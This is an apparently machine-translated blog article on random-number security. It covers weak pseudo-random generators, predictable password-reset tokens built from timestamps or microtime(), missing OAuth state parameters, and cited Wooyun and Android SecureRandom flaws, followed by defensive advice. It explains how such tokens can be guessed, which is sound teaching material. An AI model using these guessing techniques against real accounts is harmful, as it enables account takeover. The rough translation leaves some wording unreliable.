Have a chat. Random number Security

About 0x00

and friends to chat to a more interesting phenomenon, in the last two years of college interview, most students even a little basic knowledge of cryptography, even some students who penetrate the foundation.

So here I want to talk to you about some simple cryptography basics, not the implementation of the algorithm, more is and common vulnerability scenarios linked to make the problem easier to understand, a bit of meaning.

This article mainly discusses the random number, the random number is actually very extensive, can say also is the Cipher Technology Foundation.

Improper use of random numbers is likely to lead to some more serious security issues, and these security issues are usually more subtle.

0x01 random Number

Overview

The random number is widely used in computer application, and the most familiar is the application in cryptography. This article is mainly to explain some of the web security wind caused by the use of random numbers.

Let's start with a quick look at the random numbers

Classification

The random number is divided into true random number and pseudo-random number, and the basic of our program is pseudo-random number, in which pseudo-random is divided into strong pseudo-random number and weak pseudo-random number.

1. true random number , obtained through physical experiments, such as coin toss, dice, runner, noise using electronic components, nuclear fission, etc.

2. pseudo-random number , obtained by certain algorithm and seed. The software implements a pseudo-random number

1. strong pseudo-random number , unpredictable random number

2. weak pseudo-random number , easy to predict random number

Characteristics

The random number has 3 properties, as follows:

1. randomness : There is no statistical deviation, it is a completely messy sequence.

2. unpredictability : The number of the next occurrence cannot be inferred from the previous series

3. non-reproducible : The same sequence cannot be reproduced unless the sequence itself is saved

The characteristics of random numbers are related to the classification of random numbers, for example, the weak pseudo-random number only needs to satisfy the randomness, while the strong bit random number needs to satisfy the randomness and unpredictability, and the true random number needs to satisfy 3 characters simultaneously.

The key to raising security concerns is unpredictability.

Generation of pseudo-random numbers

Our common software and application implementations are pseudo-random numbers, so the focus of this article is pseudo-random numbers.

The implementation of pseudo-random number generation is usually algorithm + seed .

The specific pseudo-random number generator prng is generally:

1. Linear with Congruential

2. One-way hash function method

3. Cipher method

4. ANSI X9.17

More commonly used are linear with congruential, such as the Rand Library of our well-known C language and Java's Java.util.Random class, all using linear and congruential to generate random numbers.

Application Scenarios

Random numbers are widely used, and the following are common scenarios for random numbers:

• Verification Code Generation

• Lottery events

• UUID generation

• SessionID generation

• Token generation

• CSRF Token

• Retrieve password token

• Game (generation of random elements)

• Shuffle

• Tetris appears a sequence of specific shapes

• Game Explosive Equipment

• Password application Scenarios

• Generate key: Symmetric password, message authentication

• Generate key pair: Public key password, digital signature

• Build IV: CBC,CFB and OFB modes for grouping passwords

• Generate Nonce: Used to defend against replay attacks; CTR Mode for grouped passwords

• Generate salt: Used for password-based PBE, etc.

0x02 the security of random numbers

Random numbers are rarely a concern compared to other cryptography techniques, but random numbers are very important in cryptography and computer applications, and incorrect use of random numbers can lead to a range of security issues.

Security risk for random numbers

There are two general security problems caused by random numbers

1. The random number should be used, and the developer does not use random numbers ;

2. A strong pseudo-random number should be used, and the developer uses a weak pseudo-random number .

In the first case, simply put, we need a random number, but instead of using random numbers, the developer specifies a constant. Of course, many people will be outraged to say that SB will not use random numbers. However, please do not ignore me toward still have a lot of. There are two main scenarios:

Developers lack basic knowledge and do not know to use random numbers;

Some application scenarios and frameworks, imperfect interface documentation, or developers not reading carefully.

For example, retrieve password token, need a pseudo-random number, a lot of business directly based on the user name token;

For example, OAuth2.0 requires a third party to pass a state parameter as CSRF token to prevent CSRF attacks, and many developers do not use this parameter at all, or pass in a fixed value. The CSRF attack of OAuth is caused by the authentication party's inability to validate the value for business-level validation.

In the second case, the main difference is the strength of the pseudo-random number, the majority (all? The random libraries in the underlying libraries (common libraries) in the API documentation for the language are weak pseudo-random, and many of them are naturally used directly. However, the most important and most fatal is that the weak pseudo-random number is not used in cryptographic technology .

Or the first case of the recovery of the password scene, about token generation, a lot of development uses timestamp as a random number (MD5 (timestamp), MD5 (timestamp + user name)), but because the timestamp is predictable, it is easy to guess the solution. unpredictability is a key criterion for distinguishing weak pseudo-random numbers from strong pseudo-random numbers .

Of course, in addition to the above two cases, there are some more special cases, usually relatively rare, but also do not exclude:

1. Seed leaks, algorithms are often public, if the seed leaks, the equivalent of random numbers have been leaked;

2. The pool of random numbers is insufficient. This is also strictly a weak pseudo-random number, because the random number pool is actually caused by the random number is predictable, the attacker can be directly brute force.

Vulnerability instance

There are a lot of loopholes on the Wooyun, and it's quite interesting, it's all about random numbers.

PS: Personal strength is limited, the following examples are basically from Wooyun vulnerability instances, here thank you Daniel, if there is infringement, please contact delete.

1. Random numbers should be used instead of random numbers

Oauth2.0 This problem is particularly classic, in addition to Wooyun examples listed, in fact, many manufacturers have this problem.

The state parameter in Oauth2.0 requires the developer of a third-party app to pass in a csrf Token (random number), which causes CSRF to log on to any account if no incoming or incoming random number:

1. Only product account related vulnerability can be logged into any account via CSRF

2. Renren-Baidu OAuth 2.0 Redirect_uir CSRF Vulnerability

2. Using weak pseudo-random numbers

1) Password Retrieval

Many password retrieval scenes, will be sent to the user mail a URL, the middle contains a token, if the token is guessed, then you can retrieve the other user's password.

1.Shopex 4.8.5 New password-Generating vulnerability at password retrieval

The time function Microtime () is used directly as a random number, and then the first 6 bits of the MD5 are obtained.

#!phpsubstr (MD5 (Print_r (Microtime (), true)), 0,6);

The value of Microtime () in PHP, in addition to the number of seconds of the current server, and the number of microseconds, the number of subtle changes in the range between 0.000000-0.999999, in general, the server's time can be obtained through the Date field of the HTTP return header, So we just need to traverse these 1000000 possible values. But we have to use brute force to launch 1 million network requests, the number of network requests will also be very large. But Shopex is very sweet. Once again, the Microtime () is output once before the password is generated:

#!php$messenger = & $this->system->loadmodel (' System/messenger '); echo microtime (). "";

2. Qihoo 360 any user password modification

Direct is MD5 (Unix timestamp)

3. Graffiti Kingdom weak random number leads to arbitrary user hijacking vulnerability, with test POC

On the problem of retrieving password random number, we strongly recommend that you refer to the 11-year-old article "using system time to predict the crack Java random number | The soul of the Empty Prodigal heart

2) Other random number verification scenarios

• Cmseasy Latest version of Brute force injection (plus decryption defect/bypass anti-injection)

Weak pseudo-random number is bypassed

• Espcms v5.6 Violent injections

The use of a SQL injection vulnerability in ESPCMS, the use of which found that the ESPCMS value is encrypted and random key, but this is a random number pool fixed weak pseudo-random number, can be traversed by the attacker bypass

• Destoon 2014-05-21 Latest Version Bypass Global defense Violence Injection (official demo can be reproduced)

Using Microtime () as a random number, can be predicted by brute force hack

The Apache Harmony 6.0m3 and its previous version of the SecureRandom implementation used in the Java Encryption Architecture (JCA) prior to Android 4.4 have a security vulnerability, specifically in classlib/modules/security/ Src/main/java/common/org/apache/harmony/security/provider/crypto/sha1prng_securerandomimpl.java

The Enginenextbytes function of the class, when the user does not provide a seed to generate a random number, the program does not correctly adjust the offset, resulting in the process of generating a random sequence PRNG can be predicted.

• Android SecureRandom Vulnerability Detailed

Security recommendations

The above-mentioned random number basis and vulnerability instances are more about giving attackers some idea, and here are some suggestions for defense and prevention.

1. The business scenario requires the use of random numbers, which must use random numbers, such as token generation;

2. Random numbers are long enough to avoid brute force;

3. Ensure that random numbers of different uses use different seeds

4. Weak pseudo-random numbers that are forbidden for random numbers with high security requirements (such as password Technology):

1. Do not use time functions as random numbers (many programmers like to use timestamps) Java:system.currenttimemillis () php:microtime ()

2. Do not use weak pseudo-random number generators Java:java.util.Random Php:rand () is small in scope, 32767 Php:mt_rand () is defective

5. Strong pseudo-random number csprng (safe and reliable pseudo-random number generator (Crypto Graphically Secure pseudo-random number Generator) Various references

Platform	csprng
Php	Mcrypt_create_iv, Openssl_random_pseudo_bytes
Java	Java.security.SecureRandom
Dot NET (C #, VB)	System.Security.Cryptography.RNGCryptoServiceProvider
Ruby	SecureRandom
Python	Os.urandom
Perl	Math::random::secure
C + + (Windows API)	CryptGenRandom
Any language on Gnu/linux or Unix	Read From/dev/random Or/dev/urandom

6. Strong pseudo-random number generation (not recommended to develop its own implementation)

There are two important factors for generating high-intensity random numbers: seeds and algorithms. The algorithm can have a lot of, often how to choose the seed is very critical factor. Like random, its seed is system.currenttimemillis (), so its random number is predictable and is a weak pseudo-random number.

Strong pseudo-random number generation ideas: Collect computer information, keyboard input time, memory usage status, hard disk free space, IO delay, number of processes, number of threads and other information, CPU clock, to get an approximate random seed, mainly to achieve unpredictability.

The above is a chat about random number security content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

